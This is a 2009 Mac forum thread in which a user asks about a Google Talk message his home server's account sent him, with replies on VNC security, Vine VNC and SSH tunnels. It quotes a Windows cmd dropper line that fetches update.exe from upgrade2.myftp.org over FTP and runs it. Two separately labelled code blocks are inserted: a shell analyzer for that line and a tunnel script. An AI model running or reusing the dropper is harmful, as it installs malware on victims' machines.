
received an odd Google Talk message today- hacker?
abbaZaba
Mac Elite
Join Date: Jun 2006
Location: Pittsburgh
Status: Offline
Aug 3, 2009, 08:27 PM
 
so I have a mini that is on at all times basically acting as a server for various things that I do. I have adium running all the time signed in to a Google Talk account I just use for email to sign up for websites and whatnot. on my phone I have a google talk client that is signed into another google account (my main one, which is my full name). I use this to send messages to the mini, somewhat like taking notes or using it to remind me of something later, when I get home.

I was at work today and I received a message sent from the mini's account. here is the message:

cmd /c echo open upgrade2.myftp.org 21 >> ik &echo user temp temp >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit

echo You got owned
to me, it looks like someone was trying to execute commands through google talk to connect to an ftp server and download a file (update.exe) then send me a message telling me I got owned (what a loser).

can anyone shed some light on this? are my gmail accounts compromised in some way? the message was sent from the mini's account to my personal account with my full name which is a little disconcerting. I do not think anything was downloaded, at least I hope not.
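
Added example, not part of the original post: a POSIX shell function that splits the quoted one-liner on cmd.exe's `&` separator and reports which FTP host, account and file it stages, and whether the fetched file is then run. The function name and the key=value output names are this example's own; the sample input is the message quoted above.

```shell
#!/bin/sh
# Constructed sample: the chat message quoted in the post above.
SAMPLE='cmd /c echo open upgrade2.myftp.org 21 >> ik &echo user temp temp >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit'

# analyze_dropper MESSAGE   (hypothetical helper name)
# Prints key=value findings and exits 0 when the message stages an FTP
# script with "echo ... >> FILE" and then runs "ftp -s:FILE"; exits 1 otherwise.
# The body is a subshell, so IFS / set -f changes do not leak to the caller.
analyze_dropper() (
  msg=${1#cmd /c }
  script='' host='' port='' user='' fetched='' ftp_run=no executed=no
  set -f                         # never glob-expand untrusted text
  IFS='&'                        # cmd.exe chains commands with '&'
  for part in $msg; do
    IFS=' '; set -- $part; part="$*"     # trim and normalise spaces
    case $part in
      echo\ *'>>'*)              # one line appended to the staged script
        script=${part##*>>}; script=${script# }
        line=${part#echo }; set -- ${line%%>>*}
        case ${1:-} in
          open) host=${2:-}; port=${3:-21} ;;
          user) user=${2:-} ;;
          get)  fetched=${2:-} ;;
        esac ;;
      ftp\ *)                    # does ftp read the staged file?
        for w in "$@"; do
          if [ -n "$script" ] && [ "$w" = "-s:$script" ]; then ftp_run=yes; fi
        done ;;
      *)                         # fetched file invoked by name afterwards
        if [ -n "$fetched" ] && [ "$part" = "$fetched" ]; then executed=yes; fi ;;
    esac
  done
  [ "$ftp_run" = yes ] || exit 1
  printf 'script_file=%s\nftp_host=%s\nftp_port=%s\nftp_user=%s\n' \
    "$script" "$host" "$port" "$user"
  printf 'fetched=%s\nexecutes_download=%s\n' "$fetched" "$executed"
)

analyze_dropper "$SAMPLE"
```

The command only works where `cmd`, `ftp -s:` and `.exe` files exist, which is why it reads as aimed at Windows hosts.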
     
gilp1n
Fresh-Faced Recruit
Join Date: Mar 2009
Status: Offline
Aug 3, 2009, 11:57 PM
 
Definitely looks like something sketchy is going on - if you haven't already, I would change both passwords to be safe. Also, reporting the activity to Google might be a good idea as well.

Best of luck!
     
shifuimam
Addicted to MacNN
Join Date: Aug 2006
Location: Somewhere in the Pacific Northwest
Status: Offline
Aug 4, 2009, 01:49 AM
 
http://ubuntuforums.org/showthread.php?t=980832

VNC (which is what Apple Remote Desktop is) may be the culprit here. Try disabling it and see what happens. You also might try using a different VNC server to remote into that machine, and make sure you've set a password.
( Last edited by shifuimam; Aug 4, 2009 at 01:55 AM. )
     
abbaZaba  (op)
Mac Elite
Join Date: Jun 2006
Location: Pittsburgh
Status: Offline
Aug 4, 2009, 02:18 AM
 
why would this show up through Adium via Google Talk if VNC is the culprit?
     
Rumor
Moderator
Join Date: Feb 2006
Location: on the verge of insanity
Status: Offline
Aug 4, 2009, 02:24 AM
 
It looks more like an exploit through Bonjour (that is what Gtalk uses, no?) and aimed for Windows machines. Changing your password would not hurt, but probably will not make a difference either. I get random spam through Adium via MSN, which I chalk up to random spam.
I like my water with hops, malt, hops, yeast, and hops.
     
abbaZaba  (op)
Mac Elite
Join Date: Jun 2006
Location: Pittsburgh
Status: Offline
Aug 4, 2009, 02:26 AM
 
google talk uses jabber.

but the message originated from the client that the mini logs in to, as in the mini sent this message to me somehow, which is confusing because I am unsure how that would be possible
     
Rumor
Moderator
Join Date: Feb 2006
Location: on the verge of insanity
Status: Offline
Aug 4, 2009, 03:23 AM
 
Jabber is what I meant, just been drinking a bit.

Chances are that your email got around (it does happen even if you are careful, mine has and it is unique, only two people in the US with my first and last name). Just block it from contacting you. There are more tech folk here that can help you block it than I can. Though, I bet it is a simple fix.
     
Rumor
Moderator
Join Date: Feb 2006
Location: on the verge of insanity
Status: Offline
Aug 4, 2009, 03:24 AM
 
Check the access logs on the mini.
     
shifuimam
Addicted to MacNN
Join Date: Aug 2006
Location: Somewhere in the Pacific Northwest
Status: Offline
Aug 4, 2009, 02:27 PM
 
Originally Posted by abbaZaba:
why would this show up through Adium via Google Talk if VNC is the culprit?
Your guess is as good as mine. I just Googled "echo You got owned", and all I'm seeing is stuff about an insecure VNC server being the root cause of this particular issue. Since it's trying to run a Windows command, it's some kind of bot doing the dirty work - probably using the jabber protocol to send messages to the victim.

If it happens again, and you have Apple remote desktop enabled, you might as well try disabling it and see if this keeps happening. Just a thought.
     
abbaZaba  (op)
Mac Elite
Join Date: Jun 2006
Location: Pittsburgh
Status: Offline
Aug 4, 2009, 05:55 PM
 
well I disabled the VNC and closed that port.

is there a third party VNC server for OSX? I dislike not being able to have access to VNC options like I do in TightVNC for windows. likewise for the SFTP server built into OSX. I'd really love to be able to change that port.
     
shifuimam
Addicted to MacNN
Join Date: Aug 2006
Location: Somewhere in the Pacific Northwest
Status: Offline
Aug 4, 2009, 11:17 PM
 
Vine VNC is what I use. It's much better than Apple remote desktop anyhow, since you can connect to it with far more options than what Apple provides. You can also make it use whatever port you want, and it's got a service module that runs so that you can VNC into your Mac even if a user account isn't logged in.

Vine Server (OSXvnc) | Get Vine Server (OSXvnc) at SourceForge.net
     
hayesk
Guest
Status:
Aug 5, 2009, 03:16 PM
 
Set your router to block all ports except the SSH port and make SSH tunnels whenever you want to access the server from outside your network.
     
abbaZaba  (op)
Mac Elite
Join Date: Jun 2006
Location: Pittsburgh
Status: Offline
Aug 5, 2009, 06:22 PM
 
Vine VNC is pretty dang awesome. I dunno how I never stumbled upon it before.

as for SSH tunneling everything: I can't really do that since I use the mini (server) as a seedbox for BT, a Quinn server, pulpTunes (to access music library), etc so I think it would be a hassle to make SSH tunnels for all these things, even if it was possible.

I definitely think it would be a good idea to create an SSH tunnel for VNCing into the mini though. I just have to figure out exactly how to do this.
     
hayesk
Guest
Status:
Aug 5, 2009, 08:00 PM
 
Well, for services that are for the public, it can't be done, but for any service that is just for you, you can make a quick script to make all of the tunnels, and then anytime you want to use them, just click on your script.
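
Added example, not from the thread: one way to write the "quick script" suggested above, opening every private tunnel over a single SSH connection. The server name, the local ports and the second service are placeholders; 5900 is the standard VNC port.

```shell
#!/bin/sh
# Placeholders (assumptions, not from the thread): server and tunnel list.
SERVER=${SERVER:-user@mini.example.net}
# Each spec is name:local_port:remote_port
TUNNELS=${TUNNELS:-"vnc:5901:5900 music:8080:8080"}

# valid_port N -> status 0 if N is an integer in 1..65535
valid_port() {
  case $1 in ''|*[!0-9]*) return 1 ;; esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# build_tunnel_cmd SERVER "SPEC ..." -> prints the ssh command line
build_tunnel_cmd() {
  # -N: no remote shell, forwards only.
  # ExitOnForwardFailure: fail loudly if a local port is already taken.
  cmd="ssh -N -o ExitOnForwardFailure=yes"
  for spec in $2; do
    case $spec in
      *:*:*) ;;
      *) echo "bad tunnel spec: $spec" >&2; return 1 ;;
    esac
    rest=${spec#*:}; lport=${rest%%:*}; rport=${rest#*:}
    if ! valid_port "$lport" || ! valid_port "$rport"; then
      echo "bad tunnel spec: $spec" >&2; return 1
    fi
    # Both ends are loopback: only this machine can use the local port, and
    # the service on the server need not listen on a routable interface.
    cmd="$cmd -L 127.0.0.1:$lport:127.0.0.1:$rport"
  done
  printf '%s %s\n' "$cmd" "$1"
}

# Open the tunnels only when asked:  sh tunnels.sh up
if [ "${1:-}" = up ]; then
  cmd=$(build_tunnel_cmd "$SERVER" "$TUNNELS") || exit 1
  exec $cmd
fi
```

With the tunnels up, a VNC client pointed at `127.0.0.1:5901` reaches the server's VNC service, so the router only has to forward the SSH port.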
     
shifuimam
Addicted to MacNN
Join Date: Aug 2006
Location: Somewhere in the Pacific Northwest
Status: Offline
Aug 6, 2009, 08:20 AM
 
FWIW, I don't go that far with security on my machines, and my network is plenty secure. This is also including the fact that boyfriend serves online games from our network, so people know our IP and the various no-ip domains pointing to it. We haven't had any security breaches yet, in Windows or OS X.
     
   
All times are GMT -4.
All contents of these forums © 1995-2017 MacNN. All rights reserved.